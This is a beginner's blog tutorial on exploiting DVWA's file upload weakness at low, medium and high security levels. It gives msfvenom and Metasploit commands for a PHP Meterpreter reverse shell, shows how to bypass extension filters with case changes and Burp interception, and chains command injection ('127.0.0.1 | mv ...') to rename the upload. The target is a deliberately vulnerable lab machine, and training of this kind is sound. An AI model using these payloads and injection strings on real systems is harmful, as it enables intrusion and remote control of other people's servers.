Search

ARBITRARY FILE UPLOAD VULNERABILITY AT VARIOUS SECURITY LEVELS

Good Afternoon all,

DVWA – DAMN VULNERABLE WEB APPLICATION.

Some of you guys know well about DVWA, but this one is specially for beginners in cyber security, it may help someone who looks for arbitrary file upload Tutorial or Blogs Regarding that.

You guys can download DVWA package from their website to host it in your localhost using XAMPP or LAMPP but here I am using this as a Virtual Machine which i downloaded from Vulhub, because XAMPP is throwing some serious errors on my face, that’s why. Just kidding it needs configuration to work on it, so I went for this to make it more easier for the guys who need it.

REQUIREMENTS: Kali LINUX machine, Vulnerable Machine.(You can Install it with XAMPP in your windows too)

You can Download the OVA machine here, this machine is having more vulnerable web application to work on, we can try those to in future.

Okay, lets get back to today’s blog, today we will be going through how to Upload a file in DVWA with three levels of security Low, Medium, High.

Security Level : LOW

Launch the vulnerable Machine and Login as Username=tux, password = password, because root user don’t have the access to Chromium browser in that machine so login as tux user.

Open the chromium browser you will be seeing lot of vulnerable machines along with DVWA like in this image show below.

Click Damn Vulnerable Web App then you will be getting the login page for DVWA.

Login as Username = admin and Password = password.

Now you will be having DVWA home page, no we need to setup the security level of the application to low, so move to DVWA Security option in the left panel then change the level to low from the drop down list box then click Submit

Now it’s all set to Go, Now click File Upload option from Left panel, and left this machine running in the background then switch to KALI machine to make the payload and a listener.

To create a Payload use this command msfvenom -p php/meterpreter/reverse_tcp LHOST=(kali IP) LPORT=(KALI port) -f Raw > /root/Desktop/test.php.

Here I am using msfvenom to create a payload of PHP because the Web application is using PHP so it would be easier to execute the payload there, with meterpreter by using reverse_tcp connection, then I used Kali IP as a listening IP and port, then I saved the file in the name of test.php in Desktop location.

Now we need to transfer the file to the victim machine so i will be using the apache service in Kali to share it to the victim machine,(NOTE:Both machine should be in the same network) by using service apache2 start command.

we need to move that payload file to this location to share it to the victim machine so copy the payload and paste it in this location /var/www/html/.

Now we need to access Kali files using Kali Linux IP in URL in Victim’s Machine, then we can download it easily.

We can’t upload file with php extension at some times so we need to change the extension with upper and lowercase letters like Php. choose the file of payload that we need to upload click Upload.

Copy down the Uploads file location so we can execute that file from URL.

Now switch to Kali Linux machine to set up a Listener with Metasploitframework. Type msfconsole in terminal and wait for it to open.

Setting Up a Listener in METASPLOIT

Use these Below commands to set up a listener,

use exploit/multi/handler, This is a wild card handler to set up a listener.

set payload php/meterpreter/reverse_tcp, This is the payload which we created our payload with msfvenom.

show options, we need to setup the requirement options to before exploiting

Then set LHOST “KALI IP” and set LPORT “Kali Port” This is mainly for getting the reverse connection from the victim machine.

Next, type exploit then hit Enter, and it starts listening for the reverse connection.

Now Switch to Victim Machine, then use the copied upload path like this in URL to execute it.

Now you can see a meterpreter session is opened in Kali Machine, You got the shell now you can do post exploitation and Blah Blah!

Security Level : MEDIUM

In this security level we can’t upload files like PHP and other Document files, it’s made as only for image files like .jpeg and .png, so we need to change the extension of the test.php to test.jpeg by renaming it.

After that, we need to open Burp suite from Application icon from lower bottom then Internet–>Burp suite free edition. we will be intercepting the request, then we can change the extension of the file from .jpeg to .php in the middle then we can execute it at last.

Then set up the proxy of the browser to flow through burp suite by clicking the circular icon which is next to the URL bar then change it to Burp. Next choose the file to upload then switch on the proxy then click Upload button to intercept, like the image shown below.

In the above image you can clearly see the file name test.php, I changed it from .jpeg to php. Then click the Forward button to forward the packet.

We don’t need to set up another listener since our payload is same, but Check for your IP to make sure it’s not changed. If it is changed you can change the IP in the burp suite also by intercepting.

Close that meterpreter session, then check for the options then do exploit again for the Medium security level.

Once it is made to wait for connection switch to victim machine, since we already intercepted and changed the extension we can simply use the upload location path in the URL to execute it as same as LOW level security one.

Check for the meterpreter shell in the linux machine.

In the above image i had to change my IP coz it’s changed in the middle due to some interruptions

Security Level : HIGH

This Level is Easy with bit of Complication. We cannot intercept and change the data as in Medium level so we need take another path to do it.

Ok now we will be uploading the file as .jpeg file then click Upload. Once it is uploaded we need to Click command injection from the left panel, we will be using another vulnerability to do this one.

In Enter an IP address field type 127.0.0.1 | ls -l (Copied Path of uploaded file) here[../../hackable/uploads/].

It will list you the files in that location.

Now its clear that the file is uploaded there, now we will be renaming it there itself by using mv command, by using 127.0.0.1 | mv ../../hackable/uploads/high.jpeg [space] ../../hackable/uploads/high.php. Now the file is renamed to high.php file now we can execute it from the URL.

Same as in last 2 levels close the previous Meterpreter sessions and wait for the new one, and check for the listening IP too

then check for the meterpreter session in Kali Machine.

Voila, Everything is Done. This Task is easier one but needs to think out of the Box, so we can get pass through the security level.

Thats it for today Friends, Let’s meet in another Blog.

Bye Bye!

Table of Contents

Social Media
Facebook
Twitter
WhatsApp
LinkedIn